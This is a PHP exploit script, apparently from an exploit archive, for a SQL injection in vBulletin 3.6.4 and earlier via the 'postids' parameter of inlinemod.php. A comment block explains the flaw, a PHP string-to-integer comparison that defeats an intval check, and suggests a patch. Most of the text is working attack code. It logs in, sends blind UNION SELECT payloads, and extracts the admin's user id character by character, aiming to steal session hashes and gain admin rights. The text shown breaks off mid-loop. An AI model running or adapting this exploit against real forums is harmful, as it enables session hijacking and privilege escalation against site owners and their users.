vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit

<?php print_r(\' ----------------------------------------------------------------------------- vBulletin&nbsp;<=&nbsp;3.6.4&nbsp;inlinemod.php&nbsp;\"postids\"&nbsp;sql&nbsp;injection&nbsp;/&nbsp;privilege escalation&nbsp;by&nbsp;session&nbsp;hijacking&nbsp;exploit by&nbsp;rgod mail:&nbsp;retrog&nbsp;at&nbsp;alice&nbsp;dot&nbsp;it site:&nbsp;http://retrogod.altervista.org Works&nbsp;regardless&nbsp;of&nbsp;php.ini&nbsp;settings,&nbsp;you&nbsp;need&nbsp;a&nbsp;Super&nbsp;Moderator&nbsp;account to&nbsp;copy&nbsp;posts&nbsp;among&nbsp;threads,&nbsp;to&nbsp;be&nbsp;launched&nbsp;while&nbsp;admin&nbsp;is&nbsp;logged&nbsp;in&nbsp;to the&nbsp;control&nbsp;panel,&nbsp;this&nbsp;will&nbsp;give&nbsp;you&nbsp;full&nbsp;admin&nbsp;privileges note:&nbsp;this&nbsp;will&nbsp;flood&nbsp;the&nbsp;forum&nbsp;with&nbsp;empty&nbsp;threads&nbsp;even! ----------------------------------------------------------------------------- \'); if&nbsp;($argc<7)&nbsp;{ print_r(\' ----------------------------------------------------------------------------- Usage:&nbsp;php&nbsp;\'.$argv[0].\'&nbsp;host&nbsp;path&nbsp;user&nbsp;pass&nbsp;forumid&nbsp;postid&nbsp;OPTIONS host:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;(ip/hostname) path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path&nbsp;to&nbsp;vbulletin user/pass:&nbsp;you&nbsp;need&nbsp;a&nbsp;moderator&nbsp;account forumid:&nbsp;&nbsp;&nbsp;existing&nbsp;forum postid:&nbsp;&nbsp;&nbsp;&nbsp;existing&nbsp;post Options: &nbsp;-p[port]:&nbsp;&nbsp;&nbsp;&nbsp;specify&nbsp;a&nbsp;port&nbsp;other&nbsp;than&nbsp;80 &nbsp;-P[ip:port]:&nbsp;specify&nbsp;a&nbsp;proxy Example: php&nbsp;\'.$argv[0].\'&nbsp;localhost&nbsp;/vbulletin/&nbsp;rgod&nbsp;mypass&nbsp;2&nbsp;121&nbsp;-P1.1.1.1:80 php&nbsp;\'.$argv[0].\'&nbsp;localhost&nbsp;/vbulletin/&nbsp;rgod&nbsp;mypass&nbsp;1&nbsp;143&nbsp;-p81 ----------------------------------------------------------------------------- \'); die; } /* vulnerable&nbsp;code&nbsp;in&nbsp;inlinemod.php&nbsp;near&nbsp;lines&nbsp;185-209: ... case&nbsp;\'docopyposts\': $vbulletin->input->clean_array_gpc(\'p\',&nbsp;array( \'postids\'&nbsp;=>&nbsp;TYPE_STR, )); $postids&nbsp;=&nbsp;explode(\',\',&nbsp;$vbulletin->GPC[\'postids\']); foreach&nbsp;($postids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$postid) { if&nbsp;($postids[\"$index\"]&nbsp;!=&nbsp;intval($postid)) { unset($postids[\"$index\"]); } } if&nbsp;(empty($postids)) { eval(standard_error(fetch_error(\'no_applicable_posts_selected\'))); } if&nbsp;(count($postids)&nbsp;>&nbsp;$postlimit) { eval(standard_error(fetch_error(\'you_are_limited_to_working_with_x_posts\',&nbsp;$postlimit))); } break; ... when&nbsp;an&nbsp;element&nbsp;of&nbsp;$postids&nbsp;array&nbsp;is&nbsp;not&nbsp;an&nbsp;integer,&nbsp;it&nbsp;fails&nbsp;to&nbsp;unset()&nbsp;the&nbsp;proper&nbsp;value. An&nbsp;example: <?php $foo[1]=\"99999)&nbsp;UNION&nbsp;SELECT&nbsp;foo&nbsp;FROM&nbsp;foo&nbsp;WHERE&nbsp;foo=1&nbsp;LIMIT&nbsp;1/*\"; $foo[2]=intval($foo[1]); echo&nbsp;$foo[1].\" \"; echo&nbsp;$foo[2].\" \"; if&nbsp;($foo[1]&nbsp;!=&nbsp;$foo[2]) { &nbsp;echo&nbsp;\"they&nbsp;are&nbsp;different\"; } else { &nbsp;echo&nbsp;\"they&nbsp;match!\"; } ?> output: 99999)&nbsp;UNION&nbsp;SELECT&nbsp;foo&nbsp;FROM&nbsp;foo&nbsp;WHERE&nbsp;foo=1&nbsp;LIMIT&nbsp;1/* 99999 they&nbsp;match! this&nbsp;because&nbsp;when&nbsp;php&nbsp;tries&nbsp;to&nbsp;comparise&nbsp;a&nbsp;string&nbsp;with&nbsp;an&nbsp;integer it&nbsp;tries&nbsp;to&nbsp;convert&nbsp;the&nbsp;string&nbsp;in&nbsp;its&nbsp;integer&nbsp;value,&nbsp;it&nbsp;chooses&nbsp;the&nbsp;first&nbsp;integer&nbsp;chars of&nbsp;the&nbsp;string&nbsp;itself! so&nbsp;unset()&nbsp;never&nbsp;run! the&nbsp;result&nbsp;is&nbsp;sql&nbsp;injection&nbsp;near&nbsp;lines&nbsp;3792-3800: ... $posts&nbsp;=&nbsp;$db->query_read_slave(\" SELECT&nbsp;post.postid,&nbsp;post.threadid,&nbsp;post.visible,&nbsp;post.title,&nbsp;post.username,&nbsp;post.dateline,&nbsp;post.parentid,&nbsp;post.userid, thread.forumid,&nbsp;thread.title&nbsp;AS&nbsp;thread_title,&nbsp;thread.postuserid,&nbsp;thread.visible&nbsp;AS&nbsp;thread_visible,&nbsp;thread.firstpostid, thread.sticky,&nbsp;thread.open,&nbsp;thread.iconid FROM&nbsp;\"&nbsp;.&nbsp;TABLE_PREFIX&nbsp;.&nbsp;\"post&nbsp;AS&nbsp;post LEFT&nbsp;JOIN&nbsp;\"&nbsp;.&nbsp;TABLE_PREFIX&nbsp;.&nbsp;\"thread&nbsp;AS&nbsp;thread&nbsp;USING&nbsp;(threadid) WHERE&nbsp;postid&nbsp;IN&nbsp;(\"&nbsp;.&nbsp;implode(\',\',&nbsp;$postids)&nbsp;.&nbsp;\") ORDER&nbsp;BY&nbsp;post.dateline \"); ... this&nbsp;exploit&nbsp;extract&nbsp;various&nbsp;session&nbsp;hashes&nbsp;from&nbsp;the&nbsp;database to&nbsp;authenticate&nbsp;as&nbsp;admin&nbsp;and&nbsp;to&nbsp;change&nbsp;the&nbsp;privileges&nbsp;of&nbsp;a&nbsp;registered&nbsp;user I&nbsp;could&nbsp;not&nbsp;find&nbsp;a&nbsp;way&nbsp;to&nbsp;see&nbsp;results&nbsp;inside&nbsp;html,&nbsp;so&nbsp;this&nbsp;asks&nbsp;true/false questions&nbsp;to&nbsp;the&nbsp;database,&nbsp;copying&nbsp;posts&nbsp;around&nbsp;threads possible&nbsp;patch,&nbsp;replace: foreach&nbsp;($postids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$postid) { &nbsp;&nbsp;&nbsp; if&nbsp;($postids[\"$index\"]&nbsp;!=&nbsp;intval($postid)) { &nbsp;&nbsp;&nbsp;&nbsp;unset($postids[\"$index\"]); } } with: foreach&nbsp;($postids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$postid) { &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$postids[\"$index\"]=(int)$postids[\"$index\"]; &nbsp;&nbsp;&nbsp;&nbsp;} and,&nbsp;some&nbsp;line&nbsp;before: foreach&nbsp;($threadids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$threadid) { if&nbsp;($threadids[\"$index\"]&nbsp;!=&nbsp;intval($threadid)) { unset($threadids[\"$index\"]); } } with: foreach&nbsp;($threadids&nbsp;AS&nbsp;$index&nbsp;=>&nbsp;$threadid) { &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$threadids[\"$index\"]=(int)$threadids[\"$index\"]; &nbsp;&nbsp;&nbsp;&nbsp;} vendor&nbsp;was&nbsp;contacted&nbsp;by&nbsp;email&nbsp;form... */ error_reporting(7); ini_set(\"max_execution_time\",0); ini_set(\"default_socket_timeout\",5); function&nbsp;quick_dump($string) { &nbsp;&nbsp;$result=\'\';$exa=\'\';$cont=0; &nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=strlen($string)-1;&nbsp;$i++) &nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;if&nbsp;((ord($string[$i])&nbsp;<=&nbsp;32&nbsp;)&nbsp;|&nbsp;(ord($string[$i])&nbsp;>&nbsp;126&nbsp;)) &nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;.\";} &nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;\".$string[$i];} &nbsp;&nbsp;&nbsp;if&nbsp;(strlen(dechex(ord($string[$i])))==2) &nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;\".dechex(ord($string[$i]));} &nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;0\".dechex(ord($string[$i]));} &nbsp;&nbsp;&nbsp;$cont++;if&nbsp;($cont==15)&nbsp;{$cont=0;&nbsp;$result.=\" \";&nbsp;$exa.=\" \";} &nbsp;&nbsp;} &nbsp;return&nbsp;$exa.\" \".$result; } $proxy_regex&nbsp;=&nbsp;\'(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})\'; function&nbsp;sendpacketii($packet) { &nbsp;&nbsp;global&nbsp;$proxy,&nbsp;$host,&nbsp;$port,&nbsp;$html,&nbsp;$proxy_regex; &nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen(gethostbyname($host),$port); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;\'.$host.\':\'.$port;&nbsp;die; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;else&nbsp;{ $c&nbsp;=&nbsp;preg_match($proxy_regex,$proxy); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$c)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'Not&nbsp;a&nbsp;valid&nbsp;proxy...\';die; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;$parts=explode(\':\',$proxy); &nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\"Connecting&nbsp;to&nbsp;\".$parts[0].\":\".$parts[1].\"&nbsp;proxy... \"; &nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen($parts[0],$parts[1]); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;proxy...\';die; } &nbsp;&nbsp;} &nbsp;&nbsp;fputs($ock,$packet); &nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$html=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fgets($ock); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;else&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$html=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((!feof($ock))&nbsp;or&nbsp;(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fread($ock,1); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;} &nbsp;&nbsp;fclose($ock); } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=md5($argv[4]); $forumid=(int)$argv[5]; $existing_post=(int)$argv[6]; $port=80; $proxy=\"\"; for&nbsp;($i=3;&nbsp;$i<$argc;&nbsp;$i++){ $temp=$argv[$i][0].$argv[$i][1]; if&nbsp;(($temp<>\"-p\")&nbsp;and&nbsp;($temp<>\"-P\"))&nbsp;{$cmd.=\"&nbsp;\".$argv[$i];} if&nbsp;($temp==\"-p\") { &nbsp;&nbsp;$port=str_replace(\"-p\",\"\",$argv[$i]); } if&nbsp;($temp==\"-P\") { &nbsp;&nbsp;$proxy=str_replace(\"-P\",\"\",$argv[$i]); } } if&nbsp;(($path[0]<>\'/\')&nbsp;or&nbsp;($path[strlen($path)-1]<>\'/\'))&nbsp;{echo&nbsp;\'Error...&nbsp;check&nbsp;the&nbsp;path!\';&nbsp;die;} if&nbsp;($proxy==\'\')&nbsp;{$p=$path;}&nbsp;else&nbsp;{$p=\'http://\'.$host.\':\'.$port.$path;} $data=\"vb_login_username=$user\"; $data.=\"&vb_login_password=\"; $data.=\"&s=\"; $data.=\"&do=login\"; $data.=\"&vb_login_md5password=$pass\"; $data.=\"&vb_login_md5password_utf=$pass\"; $packet=\"POST&nbsp;\".$p.\"login.php&nbsp;HTTP/1.0 \"; $packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; $packet.=\"Referer:&nbsp;http://\".$host.$path.\"login.php \"; $packet.=\"Accept-Language:&nbsp;en \"; $packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; $packet.=\"Host:&nbsp;\".$host.\" \"; $packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; $packet.=\"Pragma:&nbsp;no-cache \"; $packet.=\"Connection:&nbsp;Close \"; $packet.=$data; sendpacketii($packet); $cookie=\"\"; $temp=explode(\"Set-Cookie:&nbsp;\",$html); for&nbsp;($i=1;&nbsp;$i<count($temp);&nbsp;$i++) { &nbsp;&nbsp;$temp2=explode(\"&nbsp;\",$temp[$i]); &nbsp;&nbsp;$cookie.=\"&nbsp;\".trim($temp2[0]); } //echo&nbsp;\"your&nbsp;cookie&nbsp;->&nbsp;\".$cookie.\" \"; if&nbsp;(!eregi(\"sessionhash\",$cookie)){die(\"failed&nbsp;to&nbsp;login...\");}$temp=str_replace(\"&nbsp;\",\"\",$cookie);$temp=str_replace(\"sessionhash\",\"\",$temp); $temp=str_replace(\"lastvisit\",\"\",$temp);$temp=str_replace(\"lastactivity\",\"\",$temp);$temp=explode(\"=\",$temp);$temp=explode(\";\",$temp[1]); $cookie_prefix=trim($temp[1]);echo&nbsp;\"cookie&nbsp;prefix&nbsp;->&nbsp;\".$cookie_prefix.\" \"; $chars[0]=0;//null $chars=array_merge($chars,range(48,57));&nbsp;//numbers $j=1;$uid=\"\"; echo&nbsp;\"admim&nbsp;user&nbsp;id&nbsp;->&nbsp;\"; while&nbsp;(!strstr($uid,chr(0))) { &nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars)) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/usergroupid=6/**/LIMIT/**/1/*\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\" \",$temp[1]); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0]; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\" unknown&nbsp;query&nbsp;error...\");} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$uid.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\" Exploit&nbsp;failed...\"); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;} $j++; } if&nbsp;(trim($uid)==\"\"){die(\" Exploit&nbsp;failed...\");}else{echo&nbsp;\" vulnerable!\";} $uid=intval($uid); function&nbsp;my_encode($my_string) { &nbsp;&nbsp;$encoded=\"CHAR(\"; &nbsp;&nbsp;for&nbsp;($k=0;&nbsp;$k<=strlen($my_string)-1;&nbsp;$k++) &nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$encoded.=ord($my_string[$k]); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($k==strlen($my_string)-1)&nbsp;{$encoded.=\")\";} &nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;{$encoded.=\",\";} &nbsp;&nbsp;} &nbsp;&nbsp;return&nbsp;$encoded; } $j=1;$my_uid=\"\"; echo&nbsp;\" your&nbsp;user&nbsp;id&nbsp;->&nbsp;\"; while&nbsp;(!strstr($my_uid,chr(0))) { &nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars)) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username=\".my_encode($user).\"/**/LIMIT/**/1/*\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1) \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\" \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp; \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\" unknown&nbsp;query&nbsp;error...\");} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\" \",$temp[1]); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0]; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/* \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php \"; 